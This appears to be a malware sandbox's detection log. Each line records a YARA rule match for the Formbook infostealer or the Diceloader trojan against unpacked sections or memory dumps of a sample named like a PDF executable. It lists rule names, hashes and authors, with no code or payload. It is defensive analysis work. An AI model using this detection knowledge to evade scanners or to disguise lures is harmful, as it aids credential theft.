Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.4604222907.0000000011264000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
